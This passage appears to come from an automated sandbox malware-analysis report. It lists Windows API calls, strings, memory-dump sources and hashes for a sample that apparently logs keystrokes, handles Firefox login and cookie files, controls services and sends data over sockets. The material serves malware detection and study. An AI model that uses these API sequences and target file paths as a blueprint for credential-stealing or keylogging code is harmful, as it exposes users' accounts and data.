                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
                      • FindClose.KERNEL32(00000000), ref: 0040A208
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Find$CloseFile$FirstNext
                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                      • API String ID: 1164774033-3681987949
                      • Opcode ID: 73ef769315aad6c42878add81738c3c9a88201f7eece84d44baa8c544f9c8ca2
                      • Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
                      • Opcode Fuzzy Hash: 73ef769315aad6c42878add81738c3c9a88201f7eece84d44baa8c544f9c8ca2
                      • Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
                      • FindClose.KERNEL32(00000000), ref: 0040A2BB
                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
                      • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
                      • GetLastError.KERNEL32 ref: 0040A397
                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
                      • FindClose.KERNEL32(00000000), ref: 0040A3D1
                      • FindClose.KERNEL32(00000000), ref: 0040A3F2
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                      • API String ID: 532992503-432212279
                      • Opcode ID: 2c1ab3ee3b965990f416345f1d4c85d5ca13f1cb4dc72bdcb68ad7aa493db07d
                      • Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
                      • Opcode Fuzzy Hash: 2c1ab3ee3b965990f416345f1d4c85d5ca13f1cb4dc72bdcb68ad7aa493db07d
                      • Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
                      • GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
                      • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 004177EB
                      • FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 00417822
                      • RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 0041789C
                      • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 004178CA
                      • RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 004178D3
                      • SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 004178F0
                      • DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 004178FD
                      • GetLastError.KERNEL32(?,0046C518,00000001), ref: 00417925
                      • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417938
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Service$CloseHandle$Open$ManagerStart
                      • String ID: 3`A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
                      • GetProcAddress.KERNEL32(00000000), ref: 004115CE
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: AddressCloseCreateLibraryLoadProcsend
                      • String ID: SHDeleteKeyW$Shlwapi.dll
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
                      • OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
                      • GetLastError.KERNEL32 ref: 004139A3
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                      • String ID: SeShutdownPrivilege
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __EH_prolog.LIBCMT ref: 004077F1
                        • Part of subcall function 00404A08: connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040789E
                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FC
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00407954
                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796B
                        • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                      • FindClose.KERNEL32(00000000), ref: 00407BA9
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089EE
                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 004089F9
                      • GetKeyboardLayout.USER32 ref: 00408A00
                      • GetKeyState.USER32 ref: 00408A0A
                      • GetKeyboardState.USER32(?), ref: 00408A17
                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A33
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A755
                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A77E
                      • GetACP.KERNEL32(?,?,0044A9DB,?,00000000), ref: 0044A793
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: InfoLocale
                      • String ID: ACP$OCP
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                        • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044A99C
                      • IsValidCodePage.KERNEL32(00000000), ref: 0044A9F7
                      • IsValidLocale.KERNEL32(?,00000001), ref: 0044AA06
                      • GetLocaleInfoW.KERNEL32(?,00001001,0043E2C1,00000040,?,0043E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0044AA4E
                      • GetLocaleInfoW.KERNEL32(?,00001002,0043E341,00000040), ref: 0044AA6D
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • String ID: gD$gD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
                        • Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D231
                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
                      • CloseHandle.KERNEL32(00000000), ref: 0040D3E9
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                        • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A397
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A3E8
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A4A8
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ErrorInfoLastLocale$_free$_abort
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 0043688B
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00436895
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 004368A2
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • String ID: .
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043DD1F,?,00000004), ref: 0044240D
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: InfoLocale
                      • String ID: GetLocaleInfoEx
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?), ref: 0041564B
                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00415717
                        • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                        • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: File$Find$CreateFirstNextchar_traits
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?), ref: 004061DE
                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040629E
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: FileFind$FirstNextsend
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • String ID: 0$>B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0044B5A6,?,?,00000008,?,?,0044FE0D,00000000), ref: 0044B7D8
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ExceptionRaise
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042F9CD
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: FeaturePresentProcessor
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • String ID: L/B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                        • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A5E7
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$_free$InfoLocale_abort
                      • String ID:
                      • API String ID: 1663032902-0
                      • Opcode ID: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
                      • Instruction ID: d815766c36d9954a4c820c073ba9809893cec4c66f47e331b0827f9a13c2a0fe
                      • Opcode Fuzzy Hash: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
                      • Instruction Fuzzy Hash: 1F21D03258020AABFB249E25DC86BBB73A8EB04314F14407BF905C6241EB3CED55CB5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                        • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                      • EnumSystemLocalesW.KERNEL32(0044A343,00000001,00000000,?,0043E2C1,?,0044A970,00000000,?,?,?), ref: 0044A28D
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                      • String ID:
                      • API String ID: 1084509184-0
                      • Opcode ID: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                      • Instruction ID: fef6e57728511f2b9b1dd238f7a777dd7648a2b970c096311ec5bc0c4a713da2
                      • Opcode Fuzzy Hash: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                      • Instruction Fuzzy Hash: 3F114C372007055FEB189F39C8916BBB791FF80359B14442DE98647740E7B6B952DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                        • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044A561,00000000,00000000,?), ref: 0044A7EF
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$InfoLocale_abort_free
                      • String ID:
                      • API String ID: 2692324296-0
                      • Opcode ID: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
                      • Instruction ID: 83d8b15de60c056d1b119042d664eee472c135ad5aa1af093dd0495062aa18b7
                      • Opcode Fuzzy Hash: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
                      • Instruction Fuzzy Hash: 3AF04932990116ABFB246B25CC057BBBB68EB00318F14442AEC05A3240EA38FE62C6D5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                        • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                      • EnumSystemLocalesW.KERNEL32(0044A593,00000001,?,?,0043E2C1,?,0044A934,0043E2C1,?,?,?,?,?,0043E2C1,?,?), ref: 0044A302
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                      • String ID:
                      • API String ID: 1084509184-0
                      • Opcode ID: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                      • Instruction ID: b467c6c7c7f8ac7ca1ad2f3a7ac430e87e8f1bd3a8912e360415dfb464baff1b
                      • Opcode Fuzzy Hash: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                      • Instruction Fuzzy Hash: 28F022323403045FEB149F399C81A6A7B95FF80368B14443EF9418B690E6B6DC419A04
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                        • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                      • EnumSystemLocalesW.KERNEL32(0044A127,00000001,?,?,?,0044A992,0043E2C1,?,?,?,?,?,0043E2C1,?,?,?), ref: 0044A207
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                      • String ID:
                      • API String ID: 1084509184-0
                      • Opcode ID: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                      • Instruction ID: a7fadff6d2ca21f630832dc779862bf22c9b6182ed5b4a5894b7910ac126a48e
                      • Opcode Fuzzy Hash: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                      • Instruction Fuzzy Hash: 1FF0553A38030557EB049F75DC49B6BBFA0FFC1719F06405AEA058B690C67AD942CB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411E51,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.2.1 Pro), ref: 0040D1F9
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                      • Instruction ID: ac7816e6a697d777cf06a73d6884089d523ece1dfcb51b9ad9a20d9ec724333c
                      • Opcode Fuzzy Hash: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                      • Instruction Fuzzy Hash: 47D05E7074021DBBEA14D6959C0AEAB7B9CD701B66F0001A6BE04D72C0E9E1AE04C7E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                      • Instruction ID: 656339de93b15354355cc6fc116552e81dda14c8a7802dd6a12fd3361ec49b7a
                      • Opcode Fuzzy Hash: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                      • Instruction Fuzzy Hash: AC515170204B495BEF38456844457BFE3989B6E744F18298FFC82D7382CE5EED06825E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5a62310b6c4938199bce2ab53516f4e3097276e77197fa2db35135d46eaa054e
                      • Instruction ID: 2cb720bef2544e5c06a33a5d17755d7e86d39b9e029a2e5d8d400cd4f85def03
                      • Opcode Fuzzy Hash: 5a62310b6c4938199bce2ab53516f4e3097276e77197fa2db35135d46eaa054e
                      • Instruction Fuzzy Hash: C832F122D29F014DD723A634C832336A249AFB33C6F55C737EC1AB5AB6EB2984C74145
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b70316521038a8c364eb9b4d2c8532403025d820ed2247955e782ac66748b0c
                      • Instruction ID: 49bedcb936ec6ce3924db17fa1c14752e1e0bec2c1eaa22c03ee826eb31dc35c
                      • Opcode Fuzzy Hash: 3b70316521038a8c364eb9b4d2c8532403025d820ed2247955e782ac66748b0c
